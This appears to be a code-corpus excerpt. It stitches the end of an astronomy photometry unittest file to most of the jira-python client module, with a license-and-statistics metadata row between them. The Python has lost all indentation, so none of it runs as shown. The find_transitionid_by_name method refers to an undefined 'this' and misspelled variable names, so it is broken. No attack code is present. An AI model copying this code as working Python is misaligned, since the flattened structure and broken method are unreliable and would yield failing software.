self.assertEqual(combinedcat['MAGERR_APER-1'].shape, (30,5))
####################
def testFluxScale(self):
normkeys = []
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
onekeys = 'FLUX_APER FLUXERR_APER IMAFLAGS_ISO'.split()
cats = []
for i in xrange(6):
cols = [pyfits.Column(name = k,
format = 'E',
array = numpy.random.standard_normal(30))\
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
for key in onekeys:
cols.append(pyfits.Column(name = key,
format = 'J',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
cats[0]['FLUX_APER'][:] = .5*numpy.ones(30)
cats[-1]['FLUX_APER'][:] = 1.5*numpy.ones(30)
keys = zerokeys + onekeys
images = [ Image(cat, rms=0, apers=numpy.ones(1), gain=1) for cat in cats ]
combinedcat = combineCats(images, fluxscale = True)
zeropoint = numpy.mean(combinedcat['FLUX_APER-1'])
scaledFlux = combinedcat['FLUX_APER-1'] / zeropoint
self.assertTrue( (scaledFlux == 1).all() )
#verify outlier rejection not triggered
error1rejected = 1./numpy.sqrt(4)
error2rejected = 1./numpy.sqrt(3)
self.assertTrue ( (combinedcat['FLUXERR_APER-1'] != error1rejected).any() )
self.assertTrue ( (combinedcat['FLUXERR_APER-1'] != error2rejected).any() )
##################################################
def test():
testcases = [TestComponents, TestFluxScale, TestUnstackedPhotometry, TestCombineFluxs, TestUnstackedPhotometry_vector, TestCombineCatalogs, TestImage]
suite = unittest.TestSuite(map(unittest.TestLoader().loadTestsFromTestCase,
testcases))
unittest.TextTestRunner(verbosity=2).run(suite)
#####################################################
# COMMAND LINE EXECUTABLE
#####################################################
if __name__ == '__main__':
if len(sys.argv) == 2 and sys.argv[1] == 'test':
test()
else:
main()
| mit | 1,512,173,792,022,315,300 | 31.518957 | 170 | 0.519143 | false |
coddingtonbear/jira | jira/client.py | 1 | 100626 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import print_function
"""
This module implements a friendly (well, friendlier) interface between the raw JSON
responses from JIRA and the Resource/dict abstractions provided by this library. Users
will construct a JIRA object as described below. Full API documentation can be found
at: https://jira-python.readthedocs.org/en/latest/
"""
from functools import wraps
import imghdr
import mimetypes
import copy
import os
import re
import string
import tempfile
import logging
import json
import warnings
import pprint
import sys
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from six import string_types, integer_types
# six.moves does not play well with pyinstaller, see https://github.com/pycontribs/jira/issues/38
# from six.moves import html_parser
if sys.version_info < (3, 0, 0):
import HTMLParser as html_parser
else:
import html.parser as html_parser
import requests
try:
from requests_toolbelt import MultipartEncoder
except:
pass
# JIRA specific resources
from jira.resources import Resource, Issue, Comment, Project, Attachment, Component, Dashboard, Filter, Votes, Watchers, \
Worklog, IssueLink, IssueLinkType, IssueType, Priority, Version, Role, Resolution, SecurityLevel, Status, User, \
CustomFieldOption, RemoteLink
# GreenHopper specific resources
from jira.resources import GreenHopperResource, Board, Sprint
from jira.resilientsession import ResilientSession
from jira import __version__
from jira.utils import threaded_requests, json_loads, JIRAError, CaseInsensitiveDict
try:
from random import SystemRandom
random = SystemRandom()
except ImportError:
import random
# warnings.simplefilter('default')
# encoding = sys.getdefaultencoding()
# if encoding != 'UTF8':
# warnings.warn("Python default encoding is '%s' instead of 'UTF8' which means that there is a big change of having problems. Possible workaround http://stackoverflow.com/a/17628350/99834" % encoding)
def translate_resource_args(func):
"""
Decorator that converts Issue and Project resources to their keys when used as arguments.
"""
@wraps(func)
def wrapper(*args, **kwargs):
arg_list = []
for arg in args:
if isinstance(arg, (Issue, Project)):
arg_list.append(arg.key)
else:
arg_list.append(arg)
result = func(*arg_list, **kwargs)
return result
return wrapper
class ResultList(list):
def __init__(self, iterable=None, _total=None):
if iterable is not None:
list.__init__(self, iterable)
else:
list.__init__(self)
self.total = _total if _total is not None else len(self)
class JIRA(object):
"""
User interface to JIRA.
Clients interact with JIRA by constructing an instance of this object and calling its methods. For addressable
resources in JIRA -- those with "self" links -- an appropriate subclass of :py:class:`Resource` will be returned
with customized ``update()`` and ``delete()`` methods, along with attribute access to fields. This means that calls
of the form ``issue.fields.summary`` will be resolved into the proper lookups to return the JSON value at that
mapping. Methods that do not return resources will return a dict constructed from the JSON response or a scalar
value; see each method's documentation for details on what that method returns.
"""
DEFAULT_OPTIONS = {
"server": "http://localhost:2990/jira",
"rest_path": "api",
"rest_api_version": "2",
"verify": True,
"resilient": True,
"async": False,
"client_cert": None,
"check_update": True,
"headers": {
'X-Atlassian-Token': 'no-check',
'Cache-Control': 'no-cache',
# 'Accept': 'application/json;charset=UTF-8', # default for REST
'Content-Type': 'application/json', # ;charset=UTF-8',
# 'Accept': 'application/json', # default for REST
#'Pragma': 'no-cache',
#'Expires': 'Thu, 01 Jan 1970 00:00:00 GMT'
}
}
checked_version = False
JIRA_BASE_URL = '{server}/rest/api/{rest_api_version}/{path}'
AGILE_BASE_URL = '{server}/rest/greenhopper/1.0/{path}'
def __init__(self, server=None, options=None, basic_auth=None, oauth=None, validate=None, async=False,
logging=True, max_retries=3):
"""
Construct a JIRA client instance.
Without any arguments, this client will connect anonymously to the JIRA instance
started by the Atlassian Plugin SDK from one of the 'atlas-run', ``atlas-debug``,
or ``atlas-run-standalone`` commands. By default, this instance runs at
``http://localhost:2990/jira``. The ``options`` argument can be used to set the JIRA instance to use.
Authentication is handled with the ``basic_auth`` argument. If authentication is supplied (and is
accepted by JIRA), the client will remember it for subsequent requests.
For quick command line access to a server, see the ``jirashell`` script included with this distribution.
The easiest way to instantiate is using j = JIRA("https://jira.atlasian.com")
:param options: Specify the server and properties this client will use. Use a dict with any
of the following properties:
* server -- the server address and context path to use. Defaults to ``http://localhost:2990/jira``.
* rest_path -- the root REST path to use. Defaults to ``api``, where the JIRA REST resources live.
* rest_api_version -- the version of the REST resources under rest_path to use. Defaults to ``2``.
* verify -- Verify SSL certs. Defaults to ``True``.
* client_cert -- a tuple of (cert,key) for the requests library for client side SSL
:param basic_auth: A tuple of username and password to use when establishing a session via HTTP BASIC
authentication.
:param oauth: A dict of properties for OAuth authentication. The following properties are required:
* access_token -- OAuth access token for the user
* access_token_secret -- OAuth access token secret to sign with the key
* consumer_key -- key of the OAuth application link defined in JIRA
* key_cert -- private key file to sign requests with (should be the pair of the public key supplied to
JIRA in the OAuth application link)
:param validate: If true it will validate your credentials first. Remember that if you are accesing JIRA
as anononymous it will fail to instanciate.
:param async: To enable async requests for those actions where we implemented it, like issue update() or delete().
Obviously this means that you cannot rely on the return code when this is enabled.
"""
if options is None:
options = {}
if server and hasattr(server, 'keys'):
warnings.warn(
"Old API usage, use JIRA(url) or JIRA(options={'server': url}, when using dictionary always use named parameters.",
DeprecationWarning)
options = server
server = None
if server:
options['server'] = server
if async:
options['async'] = async
self.logging = logging
self._options = copy.copy(JIRA.DEFAULT_OPTIONS)
self._options.update(options)
# Rip off trailing slash since all urls depend on that
if self._options['server'].endswith('/'):
self._options['server'] = self._options['server'][:-1]
self._try_magic()
if oauth:
self._create_oauth_session(oauth)
elif basic_auth:
self._create_http_basic_session(*basic_auth)
self._session.headers.update(self._options['headers'])
else:
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.headers.update(self._options['headers'])
self._session.max_retries = max_retries
if validate:
# This will raise an Exception if you are not allowed to login.
# It's better to fail faster than later.
self.session()
# We need version in order to know what API calls are available or not
si = self.server_info()
try:
self._version = tuple(si['versionNumbers'])
except Exception as e:
globals()['logging'].error("invalid server_info: %s", si)
raise e
if self._options['check_update'] and not JIRA.checked_version:
self._check_update_()
JIRA.checked_version = True
def _check_update_(self):
# check if the current version of the library is outdated
try:
data = requests.get("http://pypi.python.org/pypi/jira/json", timeout=2.001).json()
released_version = data['info']['version']
if released_version > __version__:
warnings.warn("You are running an outdated version of JIRA Python %s. Current version is %s. Do not file any bugs against older versions." % (
__version__, released_version))
except requests.RequestException:
pass
except Exception as e:
logging.warning(e)
def __del__(self):
session = getattr(self, "_session", None)
if session is not None:
if sys.version_info < (3, 4, 0): # workaround for https://github.com/kennethreitz/requests/issues/2303
session.close()
def _check_for_html_error(self, content):
# TODO: Make it return errors when content is a webpage with errors
# JIRA has the bad habbit of returning errors in pages with 200 and
# embedding the error in a huge webpage.
if '<!-- SecurityTokenMissing -->' in content:
logging.warning("Got SecurityTokenMissing")
raise JIRAError("SecurityTokenMissing: %s" % content)
return False
return True
# Information about this client
def client_info(self):
"""Get the server this client is connected to."""
return self._options['server']
# Universal resource loading
def find(self, resource_format, ids=None):
"""
Get a Resource object for any addressable resource on the server.
This method is a universal resource locator for any RESTful resource in JIRA. The
argument ``resource_format`` is a string of the form ``resource``, ``resource/{0}``,
``resource/{0}/sub``, ``resource/{0}/sub/{1}``, etc. The format placeholders will be
populated from the ``ids`` argument if present. The existing authentication session
will be used.
The return value is an untyped Resource object, which will not support specialized
:py:meth:`.Resource.update` or :py:meth:`.Resource.delete` behavior. Moreover, it will
not know to return an issue Resource if the client uses the resource issue path. For this
reason, it is intended to support resources that are not included in the standard
Atlassian REST API.
:param resource_format: the subpath to the resource string
:param ids: values to substitute in the ``resource_format`` string
:type ids: tuple or None
"""
resource = Resource(resource_format, self._options, self._session)
resource.find(ids)
return resource
def async_do(self, size=10):
"""
This will execute all async jobs and wait for them to finish. By default it will run on 10 threads.
size: number of threads to run on.
:return:
"""
if hasattr(self._session, '_async_jobs'):
logging.info("Executing async %s jobs found in queue by using %s threads..." % (
len(self._session._async_jobs), size))
threaded_requests.map(self._session._async_jobs, size=size)
# Application properties
# non-resource
def application_properties(self, key=None):
"""
Return the mutable server application properties.
:param key: the single property to return a value for
"""
params = {}
if key is not None:
params['key'] = key
return self._get_json('application-properties', params=params)
def set_application_property(self, key, value):
"""
Set the application property.
:param key: key of the property to set
:param value: value to assign to the property
"""
url = self._options['server'] + \
'/rest/api/2/application-properties/' + key
payload = {
'id': key,
'value': value
}
r = self._session.put(
url, data=json.dumps(payload))
def applicationlinks(self, cached=True):
"""
List of application links
:return: json
"""
# if cached, return the last result
if cached and hasattr(self, '_applicationlinks'):
return self._applicationlinks
#url = self._options['server'] + '/rest/applinks/latest/applicationlink'
url = self._options['server'] + \
'/rest/applinks/latest/listApplicationlinks'
r = self._session.get(url)
o = json_loads(r)
if 'list' in o:
self._applicationlinks = o['list']
else:
self._applicationlinks = []
return self._applicationlinks
# Attachments
def attachment(self, id):
"""Get an attachment Resource from the server for the specified ID."""
return self._find_for_resource(Attachment, id)
# non-resource
def attachment_meta(self):
"""Get the attachment metadata."""
return self._get_json('attachment/meta')
@translate_resource_args
def add_attachment(self, issue, attachment, filename=None):
"""
Attach an attachment to an issue and returns a Resource for it.
The client will *not* attempt to open or validate the attachment; it expects a file-like object to be ready
for its use. The user is still responsible for tidying up (e.g., closing the file, killing the socket, etc.)
:param issue: the issue to attach the attachment to
:param attachment: file-like object to attach to the issue, also works if it is a string with the filename.
:param filename: optional name for the attached file. If omitted, the file object's ``name`` attribute
is used. If you aquired the file-like object by any other method than ``open()``, make sure
that a name is specified in one way or the other.
:rtype: an Attachment Resource
"""
if isinstance(attachment, string_types):
attachment = open(attachment, "rb")
if hasattr(attachment, 'read') and hasattr(attachment, 'mode') and attachment.mode != 'rb':
logging.warning(
"%s was not opened in 'rb' mode, attaching file may fail." % attachment.name)
# TODO: Support attaching multiple files at once?
url = self._get_url('issue/' + str(issue) + '/attachments')
fname = filename
if not fname:
fname = os.path.basename(attachment.name)
if 'MultipartEncoder' not in globals():
method = 'old'
r = self._session.post(
url,
files={
'file': (fname, attachment, 'application/octet-stream')},
headers=CaseInsensitiveDict({'content-type': None, 'X-Atlassian-Token': 'nocheck'}))
else:
method = 'MultipartEncoder'
def file_stream():
return MultipartEncoder(
fields={
'file': (fname, attachment, 'text/plain')}
)
m = file_stream()
r = self._session.post(
url, data=m, headers=CaseInsensitiveDict({'content-type': m.content_type, 'X-Atlassian-Token': 'nocheck'}), retry_data=file_stream)
attachment = Attachment(self._options, self._session, json_loads(r)[0])
if attachment.size == 0:
raise JIRAError("Added empty attachment via %s method?!: r: %s\nattachment: %s" % (method, r, attachment))
return attachment
# Components
def component(self, id):
"""
Get a component Resource from the server.
:param id: ID of the component to get
"""
return self._find_for_resource(Component, id)
@translate_resource_args
def create_component(self, name, project, description=None, leadUserName=None, assigneeType=None,
isAssigneeTypeValid=False):
"""
Create a component inside a project and return a Resource for it.
:param name: name of the component
:param project: key of the project to create the component in
:param description: a description of the component
:param leadUserName: the username of the user responsible for this component
:param assigneeType: see the ComponentBean.AssigneeType class for valid values
:param isAssigneeTypeValid: boolean specifying whether the assignee type is acceptable
"""
data = {
'name': name,
'project': project,
'isAssigneeTypeValid': isAssigneeTypeValid
}
if description is not None:
data['description'] = description
if leadUserName is not None:
data['leadUserName'] = leadUserName
if assigneeType is not None:
data['assigneeType'] = assigneeType
url = self._get_url('component')
r = self._session.post(
url, data=json.dumps(data))
component = Component(self._options, self._session, raw=json_loads(r))
return component
def component_count_related_issues(self, id):
"""
Get the count of related issues for a component.
:type id: integer
:param id: ID of the component to use
"""
return self._get_json('component/' + id + '/relatedIssueCounts')['issueCount']
# Custom field options
def custom_field_option(self, id):
"""
Get a custom field option Resource from the server.
:param id: ID of the custom field to use
"""
return self._find_for_resource(CustomFieldOption, id)
# Dashboards
def dashboards(self, filter=None, startAt=0, maxResults=20):
"""
Return a ResultList of Dashboard resources and a ``total`` count.
:param filter: either "favourite" or "my", the type of dashboards to return
:param startAt: index of the first dashboard to return
:param maxResults: maximum number of dashboards to return. The total number of
results is always available in the ``total`` attribute of the returned ResultList.
"""
params = {}
if filter is not None:
params['filter'] = filter
params['startAt'] = startAt
params['maxResults'] = maxResults
r_json = self._get_json('dashboard', params=params)
dashboards = [Dashboard(self._options, self._session, raw_dash_json)
for raw_dash_json in r_json['dashboards']]
return ResultList(dashboards, r_json['total'])
def dashboard(self, id):
"""
Get a dashboard Resource from the server.
:param id: ID of the dashboard to get.
"""
return self._find_for_resource(Dashboard, id)
# Fields
# non-resource
def fields(self):
"""Return a list of all issue fields."""
return self._get_json('field')
# Filters
def filter(self, id):
"""
Get a filter Resource from the server.
:param id: ID of the filter to get.
"""
return self._find_for_resource(Filter, id)
def favourite_filters(self):
"""Get a list of filter Resources which are the favourites of the currently authenticated user."""
r_json = self._get_json('filter/favourite')
filters = [Filter(self._options, self._session, raw_filter_json)
for raw_filter_json in r_json]
return filters
def create_filter(self, name=None, description=None,
jql=None, favourite=None):
"""
Create a new filter and return a filter Resource for it.
Keyword arguments:
name -- name of the new filter
description -- useful human readable description of the new filter
jql -- query string that defines the filter
favourite -- whether to add this filter to the current user's favorites
"""
data = {}
if name is not None:
data['name'] = name
if description is not None:
data['description'] = description
if jql is not None:
data['jql'] = jql
if favourite is not None:
data['favourite'] = favourite
url = self._get_url('filter')
r = self._session.post(
url, data=json.dumps(data))
raw_filter_json = json_loads(r)
return Filter(self._options, self._session, raw=raw_filter_json)
# Groups
# non-resource
def groups(self, query=None, exclude=None, maxResults=None):
"""
Return a list of groups matching the specified criteria.
Keyword arguments:
query -- filter groups by name with this string
exclude -- filter out groups by name with this string
maxResults -- maximum results to return. defaults to system property jira.ajax.autocomplete.limit (20)
"""
params = {}
if query is not None:
params['query'] = query
if exclude is not None:
params['exclude'] = exclude
if maxResults is not None:
params['maxResults'] = maxResults
return self._get_json('groups/picker', params=params)
def group_members(self, group):
"""
Return a hash or users with their information. Requires JIRA 6.0 or will raise NotImplemented.
"""
if self._version < (6, 0, 0):
raise NotImplementedError(
"Group members is not implemented in JIRA before version 6.0, upgrade the instance, if possible.")
params = {'groupname': group, 'expand': "users"}
r = self._get_json('group', params=params)
size = r['users']['size']
end_index = r['users']['end-index']
while end_index < size - 1:
params = {'groupname': group, 'expand': "users[%s:%s]" % (
end_index + 1, end_index + 50)}
r2 = self._get_json('group', params=params)
for user in r2['users']['items']:
r['users']['items'].append(user)
end_index = r2['users']['end-index']
size = r['users']['size']
result = {}
for user in r['users']['items']:
result[user['name']] = {'fullname': user['displayName'], 'email': user['emailAddress'],
'active': user['active']}
return result
def add_group(self, groupname):
'''
Creates a new group in JIRA.
:param groupname: The name of the group you wish to create.
:return: Boolean - True if succesfull.
'''
url = self._options['server'] + '/rest/api/latest/group'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['name'] = groupname
payload = json.dumps(x)
self._session.post(url, data=payload)
return True
def remove_group(self, groupname):
'''
Deletes a group from the JIRA instance.
:param groupname: The group to be deleted from the JIRA instance.
:return: Boolean. Returns True on success.
'''
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
url = self._options['server'] + '/rest/api/latest/group'
x = {'groupname': groupname}
self._session.delete(url, params=x)
return True
# Issues
def issue(self, id, fields=None, expand=None):
"""
Get an issue Resource from the server.
:param id: ID or key of the issue to get
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# this allows us to pass Issue objects to issue()
if type(id) == Issue:
return id
issue = Issue(self._options, self._session)
params = {}
if fields is not None:
params['fields'] = fields
if expand is not None:
params['expand'] = expand
issue.find(id, params=params)
return issue
def create_issue(self, fields=None, prefetch=True, **fieldargs):
"""
Create a new issue and return an issue Resource for it.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored.
By default, the client will immediately reload the issue Resource created by this method in order to return
a complete Issue object to the caller; this behavior can be controlled through the 'prefetch' argument.
JIRA projects may contain many different issue types. Some issue screens have different requirements for
fields in a new issue. This information is available through the 'createmeta' method. Further examples are
available here: https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+Example+-+Create+Issue
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
:param prefetch: whether to reload the created issue Resource so that all of its data is present in the value\
returned from this method
"""
data = {}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
p = data['fields']['project']
if isinstance(p, string_types) or isinstance(p, integer_types):
data['fields']['project'] = {'id': self.project(p).id}
url = self._get_url('issue')
r = self._session.post(url, data=json.dumps(data))
raw_issue_json = json_loads(r)
if 'key' not in raw_issue_json:
raise JIRAError(r.status_code, request=r)
if prefetch:
return self.issue(raw_issue_json['key'])
else:
return Issue(self._options, self._session, raw=raw_issue_json)
def createmeta(self, projectKeys=None, projectIds=[], issuetypeIds=None, issuetypeNames=None, expand=None):
"""
Gets the metadata required to create issues, optionally filtered by projects and issue types.
:param projectKeys: keys of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectIds.
:param projectIds: IDs of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectKeys.
:param issuetypeIds: IDs of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeNames.
:param issuetypeNames: Names of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeIds.
:param expand: extra information to fetch inside each resource.
"""
params = {}
if projectKeys is not None:
params['projectKeys'] = projectKeys
if projectIds is not None:
if isinstance(projectIds, string_types):
projectIds = projectIds.split(',')
params['projectIds'] = projectIds
if issuetypeIds is not None:
params['issuetypeIds'] = issuetypeIds
if issuetypeNames is not None:
params['issuetypeNames'] = issuetypeNames
if expand is not None:
params['expand'] = expand
return self._get_json('issue/createmeta', params)
# non-resource
@translate_resource_args
def assign_issue(self, issue, assignee):
"""
Assign an issue to a user. None will set it to unassigned. -1 will set it to Automatic.
:param issue: the issue to assign
:param assignee: the user to assign the issue to
"""
url = self._options['server'] + \
'/rest/api/2/issue/' + str(issue) + '/assignee'
payload = {'name': assignee}
r = self._session.put(
url, data=json.dumps(payload))
@translate_resource_args
def comments(self, issue):
"""
Get a list of comment Resources.
:param issue: the issue to get comments from
"""
r_json = self._get_json('issue/' + str(issue) + '/comment')
comments = [Comment(self._options, self._session, raw_comment_json)
for raw_comment_json in r_json['comments']]
return comments
@translate_resource_args
def comment(self, issue, comment):
"""
Get a comment Resource from the server for the specified ID.
:param issue: ID or key of the issue to get the comment from
:param comment: ID of the comment to get
"""
return self._find_for_resource(Comment, (issue, comment))
@translate_resource_args
def add_comment(self, issue, body, visibility=None):
"""
Add a comment from the current authenticated user on the specified issue and return a Resource for it.
The issue identifier and comment body are required.
:param issue: ID or key of the issue to add the comment to
:param body: Text of the comment to add
:param visibility: a dict containing two entries: "type" and "value". "type" is 'role' (or 'group' if the JIRA\
server has configured comment visibility for groups) and 'value' is the name of the role (or group) to which\
viewing of this comment will be restricted.
"""
data = {
'body': body
}
if visibility is not None:
data['visibility'] = visibility
url = self._get_url('issue/' + str(issue) + '/comment')
r = self._session.post(
url, data=json.dumps(data))
comment = Comment(self._options, self._session, raw=json_loads(r))
return comment
# non-resource
@translate_resource_args
def editmeta(self, issue):
"""
Get the edit metadata for an issue.
:param issue: the issue to get metadata for
"""
return self._get_json('issue/' + str(issue) + '/editmeta')
@translate_resource_args
def remote_links(self, issue):
"""
Get a list of remote link Resources from an issue.
:param issue: the issue to get remote links from
"""
r_json = self._get_json('issue/' + str(issue) + '/remotelink')
remote_links = [RemoteLink(
self._options, self._session, raw_remotelink_json) for raw_remotelink_json in r_json]
return remote_links
@translate_resource_args
def remote_link(self, issue, id):
"""
Get a remote link Resource from the server.
:param issue: the issue holding the remote link
:param id: ID of the remote link
"""
return self._find_for_resource(RemoteLink, (issue, id))
# removed the @translate_resource_args because it prevents us from finding
# information for building a proper link
def add_remote_link(self, issue, destination, globalId=None, application=None, relationship=None):
"""
Add a remote link from an issue to an external application and returns a remote link Resource
for it. ``object`` should be a dict containing at least ``url`` to the linked external URL and
``title`` to display for the link inside JIRA.
For definitions of the allowable fields for ``object`` and the keyword arguments ``globalId``, ``application``
and ``relationship``, see https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+for+Remote+Issue+Links.
:param issue: the issue to add the remote link to
:param destination: the link details to add (see the above link for details)
:param globalId: unique ID for the link (see the above link for details)
:param application: application information for the link (see the above link for details)
:param relationship: relationship description for the link (see the above link for details)
"""
warnings.warn(
"broken: see https://bitbucket.org/bspeakmon/jira-python/issue/46 and https://jira.atlassian.com/browse/JRA-38551",
Warning)
data = {}
if type(destination) == Issue:
data['object'] = {
'title': str(destination),
'url': destination.permalink()
}
for x in self.applicationlinks():
if x['application']['displayUrl'] == destination._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
if 'globalId' not in data:
raise NotImplementedError(
"Unable to identify the issue to link to.")
else:
if globalId is not None:
data['globalId'] = globalId
if application is not None:
data['application'] = application
data['object'] = destination
if relationship is not None:
data['relationship'] = relationship
# check if the link comes from one of the configured application links
for x in self.applicationlinks():
if x['application']['displayUrl'] == self._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
url = self._get_url('issue/' + str(issue) + '/remotelink')
r = self._session.post(
url, data=json.dumps(data))
remote_link = RemoteLink(
self._options, self._session, raw=json_loads(r))
return remote_link
# non-resource
@translate_resource_args
def transitions(self, issue, id=None, expand=None):
"""
Get a list of the transitions available on the specified issue to the current user.
:param issue: ID or key of the issue to get the transitions from
:param id: if present, get only the transition matching this ID
:param expand: extra information to fetch inside each transition
"""
params = {}
if id is not None:
params['transitionId'] = id
if expand is not None:
params['expand'] = expand
return self._get_json('issue/' + str(issue) + '/transitions', params=params)['transitions']
def find_transitionid_by_name(self, issue, transition_name):
"""
Get a transitionid available on the specified issue to the current user.
Look at https://developer.atlassian.com/static/rest/jira/6.1.html#d2e1074 for json reference
:param issue: ID or key of the issue to get the transitions from
:param trans_name: iname of transition we are looking for
"""
transitions_json = this.transitions(issue)
id = None
for transition in transtitions_json["transtions"]:
if transition["name"].lower() == transition_name.lower():
id = transition["id"]
break
return id
@translate_resource_args
def transition_issue(self, issue, transition, fields=None, comment=None, **fieldargs):
# TODO: Support update verbs (same as issue.update())
"""
Perform a transition on an issue.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored. Field values will be set on the issue as part of the transition process.
:param issue: ID or key of the issue to perform the transition on
:param transition: ID or name of the transition to perform
:param comment: *Optional* String to add as comment to the issue when performing the transition.
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
"""
transitionId = None
try:
transitionId = int(transition)
except:
# cannot cast to int, so try to find transitionId by name
transitionId = self.find_transitionid_by_name(issue, transition)
if transitionId is None:
raise JIRAError("Invalid transition name. %s" % transition)
data = {
'transition': {
'id': transitionId
}
}
if comment:
data['update'] = {'comment': [{'add': {'body': comment}}]}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
url = self._get_url('issue/' + str(issue) + '/transitions')
r = self._session.post(
url, data=json.dumps(data))
@translate_resource_args
def votes(self, issue):
"""
Get a votes Resource from the server.
:param issue: ID or key of the issue to get the votes for
"""
return self._find_for_resource(Votes, issue)
@translate_resource_args
def add_vote(self, issue):
"""
Register a vote for the current authenticated user on an issue.
:param issue: ID or key of the issue to vote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
r = self._session.post(url)
@translate_resource_args
def remove_vote(self, issue):
"""
Remove the current authenticated user's vote from an issue.
:param issue: ID or key of the issue to unvote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
self._session.delete(url)
@translate_resource_args
def watchers(self, issue):
"""
Get a watchers Resource from the server for an issue.
:param issue: ID or key of the issue to get the watchers for
"""
return self._find_for_resource(Watchers, issue)
@translate_resource_args
def add_watcher(self, issue, watcher):
"""
Add a user to an issue's watchers list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to add to the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
self._session.post(
url, data=json.dumps(watcher))
@translate_resource_args
def remove_watcher(self, issue, watcher):
"""
Remove a user from an issue's watch list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to remove from the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
params = {'username': watcher}
result = self._session.delete(url, params=params)
return result
@translate_resource_args
def worklogs(self, issue):
"""
Get a list of worklog Resources from the server for an issue.
:param issue: ID or key of the issue to get worklogs from
"""
r_json = self._get_json('issue/' + str(issue) + '/worklog')
worklogs = [Worklog(self._options, self._session, raw_worklog_json)
for raw_worklog_json in r_json['worklogs']]
return worklogs
@translate_resource_args
def worklog(self, issue, id):
"""
Get a specific worklog Resource from the server.
:param issue: ID or key of the issue to get the worklog from
:param id: ID of the worklog to get
"""
return self._find_for_resource(Worklog, (issue, id))
@translate_resource_args
def add_worklog(self, issue, timeSpent=None, timeSpentSeconds=None, adjustEstimate=None,
newEstimate=None, reduceBy=None, comment=None, started=None, user=None):
"""
Add a new worklog entry on an issue and return a Resource for it.
:param issue: the issue to add the worklog to
:param timeSpent: a worklog entry with this amount of time spent, e.g. "2d"
:param adjustEstimate: (optional) allows the user to provide specific instructions to update the remaining\
time estimate of the issue. The value can either be ``new``, ``leave``, ``manual`` or ``auto`` (default).
:param newEstimate: the new value for the remaining estimate field. e.g. "2d"
:param reduceBy: the amount to reduce the remaining estimate by e.g. "2d"
:param started: Moment when the work is logged, if not specified will default to now
:param comment: optional worklog comment
"""
params = {}
if adjustEstimate is not None:
params['adjustEstimate'] = adjustEstimate
if newEstimate is not None:
params['newEstimate'] = newEstimate
if reduceBy is not None:
params['reduceBy'] = reduceBy
data = {}
if timeSpent is not None:
data['timeSpent'] = timeSpent
if timeSpentSeconds is not None:
data['timeSpentSeconds'] = timeSpentSeconds
if comment is not None:
data['comment'] = comment
elif user:
# we log user inside comment as it doesn't always work
data['comment'] = user
if started is not None:
# based on REST Browser it needs: "2014-06-03T08:21:01.273+0000"
data['started'] = started.strftime("%Y-%m-%dT%H:%M:%S.000%z")
if user is not None:
data['author'] = {"name": user,
'self': self.JIRA_BASE_URL + '/rest/api/2/user?username=' + user,
'displayName': user,
'active': False
}
data['updateAuthor'] = data['author']
# TODO: report bug to Atlassian: author and updateAuthor parameters are
# ignored.
url = self._get_url('issue/{0}/worklog'.format(issue))
r = self._session.post(url, params=params, data=json.dumps(data))
return Worklog(self._options, self._session, json_loads(r))
# Issue links
@translate_resource_args
def create_issue_link(self, type, inwardIssue, outwardIssue, comment=None):
"""
Create a link between two issues.
:param type: the type of link to create
:param inwardIssue: the issue to link from
:param outwardIssue: the issue to link to
:param comment: a comment to add to the issues with the link. Should be a dict containing ``body``\
and ``visibility`` fields: ``body`` being the text of the comment and ``visibility`` being a dict containing\
two entries: ``type`` and ``value``. ``type`` is ``role`` (or ``group`` if the JIRA server has configured\
comment visibility for groups) and ``value`` is the name of the role (or group) to which viewing of this\
comment will be restricted.
"""
# let's see if we have the right issue link 'type' and fix it if needed
if not hasattr(self, '_cached_issuetypes'):
self._cached_issue_link_types = self.issue_link_types()
if type not in self._cached_issue_link_types:
for lt in self._cached_issue_link_types:
if lt.outward == type:
# we are smart to figure it out what he ment
type = lt.name
break
elif lt.inward == type:
# so that's the reverse, so we fix the request
type = lt.name
inwardIssue, outwardIssue = outwardIssue, inwardIssue
break
data = {
'type': {
'name': type
},
'inwardIssue': {
'key': inwardIssue
},
'outwardIssue': {
'key': outwardIssue
},
'comment': comment
}
url = self._get_url('issueLink')
r = self._session.post(
url, data=json.dumps(data))
